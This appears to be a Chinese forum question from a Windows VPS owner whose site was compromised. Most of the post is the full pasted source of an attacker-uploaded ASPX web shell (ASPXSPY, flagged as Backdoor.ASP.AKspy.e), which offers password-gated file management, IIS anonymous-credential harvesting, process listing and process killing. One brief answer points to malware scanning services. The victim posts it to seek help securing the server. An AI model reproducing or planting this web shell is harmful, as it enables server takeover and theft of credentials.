我有一个安装了 WebsitePanel 的 Windows 2012 (数据中心版) VPS 主机,今天我发现攻击者已将其文件上传到我的网站文件夹 \wwwroot 下。我必须删除 \wwwroot 下的所有文件和文件夹,然后将我的网站文件重新上传到文件夹 \wwwroot 下。
我不知道我的系统存在什么安全问题,也不知道我的 asp.net 应用程序是否存在安全问题。此外,攻击者拥有哪些权限可以将其文件上传到 \wwwroot?所以我担心攻击者可以再次将其文件上传到文件夹 \wwwroot。
我如何检查 vps 服务器的安全性?谢谢!
此外,我在攻击者上传的search.aspx文件中发现了Backdoor.ASP.AKspy.e
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Runtime.InteropServices"%>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ Import Namespace="System.Threading"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<%@ import Namespace="Microsoft.VisualBasic"%>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
/*
Thanks Snailsor,FuYu,BloodSword,Cnqing,
Code by Bin
Make in China
Blog: http://www.rootkit.net.cn
E-mail : [email protected]
*/
public string Password="f31fd2b1efc8b377e9eac5e2747a03fc";//This is a MD5(32)
public string vbhLn="AS-PX-She-ll";
public int TdgGU=1;
protected OleDbConnection Dtdr=new OleDbConnection();
protected OleDbCommand Kkvb=new OleDbCommand();
public NetworkStream NS=null;
public NetworkStream NS1=null;
TcpClient tcp=new TcpClient();
TcpClient zvxm=new TcpClient();
ArrayList IVc=new ArrayList();
protected void Page_load(object sender,EventArgs e)
{
string agent = System.Web.HttpContext.Current.Request.ServerVariables["HTTP_USER_AGENT"];
if (!agent.Contains("myccs"))
{
Response.End();
}
YFcNP(this);
fhAEn();
if (!pdo())
{
return;
}
if(IsPostBack)
{
string tkI=Request["__EVENTTARGET"];
string VqV=Request["__File"];
if(tkI!="")
{
switch(tkI)
{
case "Bin_Parent":
krIR(Ebgw(VqV));
break;
case "Bin_Listdir":
krIR(Ebgw(VqV));
break;
case "kRXgt":
kRXgt(Ebgw(VqV));
break;
case "Bin_Createfile":
gLKc(VqV);
break;
case "Bin_Editfile":
gLKc(VqV);
break;
case "Bin_Createdir":
stNPw(VqV);
break;
case "cYAl":
cYAl(VqV);
break;
case "ksGR":
ksGR(Ebgw(VqV));
break;
case "SJv":
SJv(VqV);
break;
case "Bin_Regread":
tpRQ(Ebgw(VqV));
break;
case "hae":
hae();
break;
case "urJG":
urJG(VqV);
break;
}
if(tkI.StartsWith("dAJTD"))
{
dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
}
else if(tkI.StartsWith("Tlvz"))
{
Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
}
else if(tkI.StartsWith("Bin_CFile"))
{
YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
}
}
}
else
{
PBZw();
}
}
public bool pdo()
{
if(Request.Cookies[vbhLn]==null)
{
tZSx();
return false;
}
else
{
if (Request.Cookies[vbhLn].Value != Password)
{
tZSx();
return false;
}
else
{
return true;
}
}
}
public void tZSx()
{
ljtzC.Visible=true;
ZVS.Visible=false;
}
protected void YKpI(object sender,EventArgs e)
{
Session.Abandon();
Response.Cookies.Add(new HttpCookie(vbhLn,null));
tZSx();
}
public void PBZw()
{
ZVS.Visible=true;
//ljtzC.Visible=false;
//Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
//Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
//Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
//Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
//Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
if (AXSbb.Value==string.Empty)
{
AXSbb.Value=OElM(Server.MapPath("."));
}
Bin_H2_Title.InnerText="File Manager >>";
krIR(AXSbb.Value);
}
public void fhAEn()
{
try
{
string[] YRgt=Directory.GetLogicalDrives();
for(int i=0;i<YRgt.Length;i++)
{
Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
Bin_Span_Drv.Controls.Add(c);
LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
nxeDR.Command+=new CommandEventHandler(this.iVk);
}
}catch(Exception ex){}
}
public string OElM(string path)
{
if(path.Substring(path.Length-1,1)!=@"\")
{
path=path+@"\";
}
return path;
}
public string nrrx(string path)
{
char[] trim={'\\'};
if(path.Substring(path.Length-1,1)==@"\")
{
path=path.TrimEnd(trim);
}
return path;
}
[DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
public static extern int OMZP(string nDrive);
public string mFvj(string instr)
{
string EuXD=string.Empty;
int num=OMZP(instr);
switch(num)
{
case 1:
EuXD="Unknow("+instr+")";
break;
case 2:
EuXD="Removable("+instr+")";
break;
case 3:
EuXD="Fixed("+instr+")";
break;
case 4:
EuXD="Network("+instr+")";
break;
case 5:
EuXD="CDRom("+instr+")";
break;
case 6:
EuXD="RAM Disk("+instr+")";
break;
}
return EuXD.Replace(@"\","");
}
public string MVVJ(string instr)
{
byte[] tmp=Encoding.Default.GetBytes(instr);
return Convert.ToBase64String(tmp);
}
public string Ebgw(string instr)
{
byte[] tmp=Convert.FromBase64String(instr);
return Encoding.Default.GetString(tmp);
}
public void krIR(string path)
{
WICxe();
CzfO.Visible=true;
Bin_H2_Title.InnerText="File Manager >>";
AXSbb.Value=OElM(path);
DirectoryInfo GQMM=new DirectoryInfo(path);
if(Directory.GetParent(nrrx(path))!=null)
{
string bg=OKM();
TableRow p=new TableRow();
for(int i=1;i<6;i++)
{
TableCell pc=new TableCell();
if(i==1)
{
pc.Width=Unit.Parse("2%");
pc.Text="0";
p.CssClass=bg;
}
if(i==2)
{
pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
}
p.Cells.Add(pc);
UGzP.Rows.Add(p);
}
}
try
{
int vLlH=0;
foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
{
string bg=OKM();
vLlH++;
TableRow tr=new TableRow();
TableCell tc=new TableCell();
tc.Width=Unit.Parse("2%");
tc.Text="0";
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=bg;
tr.Attributes["onmouseout"]="this.className='"+bg+"';";
tr.Cells.Add(tc);
TableCell HczyN=new TableCell();
HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
tr.Cells.Add(HczyN);
TableCell LYZK=new TableCell();
LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
tr.Cells.Add(LYZK);
UGzP.Rows.Add(tr);
TableCell ERUL=new TableCell();
ERUL.Text="--";
tr.Cells.Add(ERUL);
UGzP.Rows.Add(tr);
TableCell ZGKh=new TableCell();
ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
tr.Cells.Add(ZGKh);
UGzP.Rows.Add(tr);
}
TableRow cKVA=new TableRow();
cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
cKVA.Attributes["bgcolor"]="#dddddd";
TableCell JlmW=new TableCell();
JlmW.Attributes["colspan"]="6" ;
JlmW.Attributes["height"]="5";
cKVA.Cells.Add(JlmW);
UGzP.Rows.Add(cKVA);
int aYRwo=0;
foreach(FileInfo Bin_Files in GQMM.GetFiles())
{
aYRwo++;
string gb=OKM();
TableRow tr=new TableRow();
TableCell tc=new TableCell();
tc.Width=Unit.Parse("2%");
tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=gb;
tr.Attributes["onmouseout"]="this.className='"+gb+"';";
tr.Cells.Add(tc);
TableCell filename=new TableCell();
if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
{
string url=Request.Url.ToString();
filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
}
else
{
filename.Text=Bin_Files.Name;
}
TableCell albt=new TableCell();
albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
TableCell YzK=new TableCell();
YzK.Text=mTG(Bin_Files.Length);
TableCell GLpi=new TableCell();
GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
tr.Cells.Add(filename);
tr.Cells.Add(albt);
tr.Cells.Add(YzK);
tr.Cells.Add(GLpi);
UGzP.Rows.Add(tr);
}
string lgb=OKM();
TableRow oWam=new TableRow();
oWam.CssClass=lgb;
for(int i=1;i<4;i++)
{
TableCell lGV=new TableCell();
if(i==1)
{
lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
}
if(i==2)
{
lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
}
if(i==3)
{
lGV.ColumnSpan=4;
lGV.Style.Add("text-align","right");
lGV.Text=vLlH+" directories/ "+aYRwo+" files";
}
oWam.Cells.Add(lGV);
}
UGzP.Rows.Add(oWam);
}
catch(Exception error)
{
xseuB(error.Message);
}
}
public string OKM()
{
TdgGU++;
if(TdgGU % 2==0)
{
return "alt1";
}
else
{
return "alt2";
}
}
public void kRXgt(string qcKu)
{
try
{
Directory.Delete(qcKu,true);
xseuB("Directory delete new success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(Directory.GetParent(qcKu).ToString());
}
public void dAJTD(string sdir,string ddir)
{
try
{
Directory.Move(sdir,ddir);
xseuB("Directory Renamed Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void Tlvz(string sfile,string dfile)
{
try
{
File.Move(sfile,dfile);
xseuB("File Renamed Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void YByN(string spath,string dpath)
{
try
{
File.Copy(spath,dpath);
xseuB("File Copy Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void stNPw(string path)
{
try
{
Directory.CreateDirectory(AXSbb.Value+path);
xseuB("Directory created success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void gLKc(string path)
{
if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
{
foreach(ListItem item in NdCX.Items)
{
if(item.Selected=true)
{
item.Selected=false;
}
}
}
Bin_H2_Title.InnerHtml="Create/ Edit File >>";
WICxe();
vrFA.Visible=true;
if(path.IndexOf(":")< 0)
{
Sqon.Value=AXSbb.Value+path;
}
else
{
Sqon.Value=path;
}
if(File.Exists(Sqon.Value))
{
StreamReader sr;
if(NdCX.SelectedItem.Text=="UTF-8")
{
sr=new StreamReader(Sqon.Value,Encoding.UTF8);
}
else
{
sr=new StreamReader(Sqon.Value,Encoding.Default);
}
Xgvv.InnerText=sr.ReadToEnd();
sr.Close();
}
else
{
Xgvv.InnerText=string.Empty;
}
}
public void ksGR(string path)
{
FileInfo fs=new FileInfo(path);
Response.Clear();
Page.Response.ClearHeaders();
Page.Response.Buffer=false;
this.EnableViewState=false;
Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
Response.AddHeader("Content-Length",fs.Length.ToString());
Page.Response.ContentType="application/unknown";
Response.WriteFile(fs.FullName);
Page.Response.Flush();
Page.Response.Close();
Response.End();
Page.Response.Clear();
}
public void SJv(string path)
{
try
{
string[] spdT=path.Split(',');
for(int i=0;i<spdT.Length-1;i++)
{
File.Delete(AXSbb.Value+Ebgw(spdT[i]));
}
xseuB("File Delete Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
krIR(AXSbb.Value);
}
public void hae()
{
try
{
File.Delete(Request.PhysicalPath);
Response.Redirect("http://www.rootkit.net.cn");
}
catch(Exception error)
{
xseuB(error.Message);
}
}
public void cYAl(string path)
{
Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
WICxe();
zRyG.Visible=true;
QiFB.Value=AXSbb.Value+path;
lICp.Value=AXSbb.Value;
pWVL.Value=AXSbb.Value+path;
string Att=File.GetAttributes(QiFB.Value).ToString();
if(Att.LastIndexOf("ReadOnly")!=-1)
{
ZhWSK.Checked=true;
}
if(Att.LastIndexOf("System")!=-1)
{
SsR.Checked=true;
}
if(Att.LastIndexOf("Hidden")!=-1)
{
ccB.Checked=true;
}
if(Att.LastIndexOf("Archive")!=-1)
{
fbyZ.Checked=true;
}
yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
}
public static String mTG(Int64 fileSize)
{
if(fileSize<0)
{
throw new ArgumentOutOfRangeException("fileSize");
}
else if(fileSize >= 1024 * 1024 * 1024)
{
return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
}
else if(fileSize >= 1024 * 1024)
{
return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
}
else if(fileSize >= 1024)
{
return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
}
else
{
return string.Format("{0} B",fileSize);
}
}
private bool SGde(string sSrc)
{
Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
if(reg.IsMatch(sSrc))
{
return true;
}
else
{
return false;
}
}
public void AdCx()
{
string qcKu=string.Empty;
string mWGEm="IIS://localhost/W3SVC";
GlI.Style.Add("word-break","break-all");
try
{
DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
int fmW=0;
foreach(DirectoryEntry child in HHzcY.Children)
{
if(SGde(child.Name.ToString()))
{
fmW++;
DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
string bg=OKM();
TableRow TR=new TableRow();
TR.Attributes["onmouseover"]="this.className='focus';";
TR.CssClass=bg;
TR.Attributes["onmouseout"]="this.className='"+bg+"';";
TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
for(int i=1;i<6;i++)
{
try
{
TableCell tfit=new TableCell();
switch(i)
{case 1:
tfit.Text=fmW.ToString();
break;
case 2:
tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
break;
case 3:
tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
break;
case 4:
StringBuilder sb=new StringBuilder();
PropertyValueCollection pc=child.Properties["ServerBindings"];
for (int j=0; j < pc.Count; j++)
{
sb.Append(pc[j].ToString()+"<br>");
}
tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
break;
case 5:
tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
break;
}
TR.Cells.Add(tfit);
}
catch (Exception ex)
{
xseuB(ex.Message);
continue;
}
}
GlI.Controls.Add(TR);
}
}
}
catch(Exception ex)
{
xseuB(ex.Message);
}
}
public ManagementObjectCollection PhQTd(string query)
{
ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
return QS.Get();
}
public DataTable cCf(string query)
{
DataTable dt=new DataTable();
int i=0;
ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
try
{
foreach(ManagementObject m in QS.Get())
{
DataRow dr=dt.NewRow();
PropertyDataCollection.PropertyDataEnumerator oEnum;
oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
while(oEnum.MoveNext())
{
PropertyData DRU=(PropertyData)oEnum.Current;
if(dt.Columns.IndexOf(DRU.Name)==-1)
{
dt.Columns.Add(DRU.Name);
dt.Columns[dt.Columns.Count-1].DefaultValue="";
}
if(m[DRU.Name]!=null)
{
dr[DRU.Name]=m[DRU.Name].ToString();
}
else
{
dr[DRU.Name]=string.Empty;
}
}
dt.Rows.Add(dr);
}
}
catch(Exception error)
{
}
return dt;
}
public void YUw()
{
try
{
Bin_H2_Title.InnerText="Process >>";
WICxe();
DCbS.Visible=true;
int UEbTI=0;
Process[] p=Process.GetProcesses();
foreach(Process sp in p)
{
UEbTI++;
string bg=OKM();
TableRow tr=new TableRow();
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=bg;
tr.Attributes["onmouseout"]="this.className='"+bg+"';";
for(int i=1;i<7;i++)
{
TableCell td=new TableCell();
if(i==1)
{
td.Width=Unit.Parse("2%");
td.Text=UEbTI.ToString();
tr.Controls.Add(td);
}
if(i==2)
{
td.Text=sp.Id.ToString();
tr.Controls.Add(td);
}
if(i==3)
{
td.Text=sp.ProcessName.ToString();
tr.Controls.Add(td);
}
if(i==4)
{
td.Text=sp.Threads.Count.ToString();
tr.Controls.Add(td);
}
if(i==5)
{
td.Text=sp.BasePriority.ToString();
tr.Controls.Add(td);
}
if(i==6)
{
td.Text="--";
tr.Controls.Add(td);
}
}
IjsL.Controls.Add(tr);
}
}
catch(Exception error)
{
AIz();
}
AIz();
}
public void AIz()
{
try
{
Bin_H2_Title.InnerText="Process >>";
WICxe();
DCbS.Visible=true;
int UEbTI=0;
DataTable dt=cCf("Win32_Process");
for(int j=0;j<dt.Rows.Count;j++)
{
UEbTI++;
string bg=OKM();
TableRow tr=new TableRow();
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=bg;
tr.Attributes["onmouseout"]="this.className='"+bg+"';";
for(int i=1;i<7;i++)
{
TableCell td=new TableCell();
if(i==1)
{
td.Width=Unit.Parse("2%");
td.Text=UEbTI.ToString();
tr.Controls.Add(td);
}
if(i==2)
{
td.Text=dt.Rows[j]["ProcessID"].ToString();
tr.Controls.Add(td);
}
if(i==3)
{
td.Text=dt.Rows[j]["Name"].ToString();
tr.Controls.Add(td);
}
if(i==4)
{
td.Text=dt.Rows[j]["ThreadCount"].ToString();
tr.Controls.Add(td);
}
if(i==5)
{
td.Text=dt.Rows[j]["Priority"].ToString();
tr.Controls.Add(td);
}
if(i==6)
{
if( dt.Rows[j]["CommandLine"]!=string.Empty)
{
td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
}
else
{
td.Text="--";
}
tr.Controls.Add(td);
}
}
IjsL.Controls.Add(tr);
}
}
catch(Exception error)
{
xseuB(error.Message);
}
}
public void urJG(string pid)
{
try
{
foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
{
p.InvokeMethod("Terminate",null);
p.Dispose();
}
xseuB("Process Kill Success !");
}
catch(Exception error)
{
xseuB(error.Message);
}
AIz();
}
public void oHpF()
{
try
{
Bin_H2_Title.InnerText="Services >>";
WICxe();
iQxm.Visible=true;
int UEbTI=0;
ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
for(int i=0;i<kQmRu.Length;i++)
{
UEbTI++;
string bg=OKM();
TableRow tr=new TableRow();
tr.Attributes["onmouseover"]="this.className='focus';";
tr.CssClass=bg;
tr.Attributes["onmouseout"]="this.className='"+bg+"';";
for(int b=1;b<7;b++)
{
TableCell td=new TableCell();
if(b==1)
{
td.Width=Unit.Parse("2%");
td.Text=UEbTI.ToString();
tr.Controls.Add(td);
}
if(b==2)
{
td.Text="null";
tr.Controls.Add(td);
}
if(b==3)
{
td.Text=kQmRu[i].ServiceName.ToString();
tr.Controls.Add(td);
}
if(b==4)
{
td.Text="";
tr.Controls.Add(td);
}
if(b==5)
{
string kOIo=kQmRu[i].Status.ToString();
if(kOIo=="Running")
{
td.Text="<font color=green>"+kOIo+"</font>";
}
else
{
td.Text="<font color=red>"+kOIo+"</font>";
}
tr.Controls.Add(td);
}
if(b==6)
{
td.Text="";
tr.Controls.Add(td);
}
}
vHCs.Controls.Add(tr);
}
}
catch(Exception error)
{
xseuB(error.Message);
}
}
答案1
我建议使用 sucuri 来检测网站上的恶意软件
Use http://sitecheck.sucuri.net to determine if your website is compromised or not.
或者你可以使用一些付费服务,他们会扫描服务器以查找漏洞:
https://www.securitymetrics.com/sm/pub/